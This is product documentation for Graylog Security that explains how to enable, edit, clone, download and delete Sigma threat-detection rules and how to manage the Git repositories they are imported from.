Manage Sigma Rules

The following article exclusively pertains to a Graylog Security feature or functionality. Graylog Security is a part of the Graylog centralized log management platform and requires a separate license. Contact the Graylog Sales team for more information on this product.

Sigma rules and Sigma Correlation help detect threats by matching log events against known attack patterns. After you add rules to Graylog, you can manage and maintain them using Graylog’s built-in tools to ensure your detection logic stays organized, up to date, and aligned with your monitoring strategy.

This article focuses on the management aspects of Sigma rules and repositories within Graylog

Prerequisites

Before proceeding, ensure that the following prerequisites are met:

  • You must have a Graylog Security license.

  • Graylog 4.3 or higher is required for Sigma rules.

  • Graylog Illuminate is recommended for use with Sigma rules and Sigma Correlation.

Manage Rules

All imported and user-defined Sigma rules are displayed in a table on the Sigma Rules page. Each entry includes key metadata such as the rule’s description, operational status, and configuration parameters. The Enabled column contains a toggle switch that allows you to enable or disable each rule.

  • Enabled: Rule runs on its defined schedule.

  • Disabled: Rule is inactive and does not evaluate logs or generate alerts.

To manage your Sigma rules:

  1. Navigate to the Security layout in Graylog.​

  2. Go to Sigma Rules > Rules.

  3. Select the ellipsis () next to a selected rule and choose the desired action from the menu options. From here, you can:

Search Logs

Each Sigma rule imported into Graylog can also be executed directly as a search. This action opens a search view using the logic from the rule. This functionality is helpful when reviewing real-time or historical matches based on the rule conditions and can also help both when writing new rules as well as understanding existing ones.

Hint: To test the performance of individual rules, we recommend you use the Search Logs option before activating the Sigma rule.

Edit Rule

To modify an existing rule:

  1. Click the ellipsis () next to the rule.

  2. Select Edit from the menu options.

  3. Update YAML definitions, metadata, associated streams, or execution schedules.

  4. Click Save changes to update the rule.

Hint: Sigma rules from Illuminate packs derive their rule logic and configuration settings from the content packs, so you can only edit these rules to add notifications and filters but not the actual rule logic.

Clone Rule

If you want to create a variant of an existing rule:

  1. Click the ellipsis () next to the rule.

  2. Choose Clone from the menu options.

  3. Edit the cloned rule’s contents to customize it.

  4. Save the new rule with unique metadata or correlation logic by clicking the Add rule button.

This capability is useful for adapting standard rules to specific environments. The new rule can be modified independently without affecting the original.

Download Rule

  1. Click the ellipsis () next to the rule.

  2. Select Download from the menu options. The rule is downloaded as a .yaml file.

This functionality is useful for backups, offline review, transferring rules between environments, or sharing with teams.

Edit Event Definition

Every Sigma rule is automatically associated with an event definition when created; however, you can edit event definitions by:

  1. Click the ellipsis () next to the rule.

  2. Select Edit Event Definition from the menu options. This action opens the associated event definition used for alerting when the rule is triggered.

  3. Modify remediation notes attached to the event definition, add custom fields, and edit notification settings.

Warning: Do not change the condition type of an event definition. This action breaks the connection between the Sigma rule and the event definition, and the rule no longer operates correctly. Changing the event type to either Filter & Aggregation or Correlation creates a completely different event definition.

Delete Rule

This action permanently deletes the rule from Graylog. Before deletion, Graylog prompts for confirmation.

Warning: Deleting a rule also removes its detection logic and disables any linked alerts.

Bulk Actions

Use the check boxes on the left to select multiple rules, then apply bulk actions. The following functionality is available for bulk actions: enable, disable, add notification, download, and delete.

Hint: Note that the bulk Add Notification feature is strictly additive. New notifications are added to existing rules, and existing notifications for the rules remain.

Manage Repositories

From the list of imported repositories located in the Sigma Repos tab, you can perform the following actions. These actions can be performed on a single repository by clicking the ellipsis to the right of a selected repository, then selecting the required action from the options listed below.

  • Edit: Update the branch or directories from which to source rules.

  • Import All: Imports all valid rules from a repository into Graylog.

  • Refresh: Refreshes the list of available rules, if for instance, rules have been added or changed in the Git repository.

  • Delete: Deletes the repository metadata from Graylog. The rules will no longer be available to import, but any rules that were added remain. Delete can also be done in bulk. Select multiple repository check boxes, click the Bulk Actions button, then select Delete.

All added repositories are shown in the Sigma Rules GIT Repos page.

Further Reading

Explore the following additional resources and recommended readings to expand your knowledge on related topics: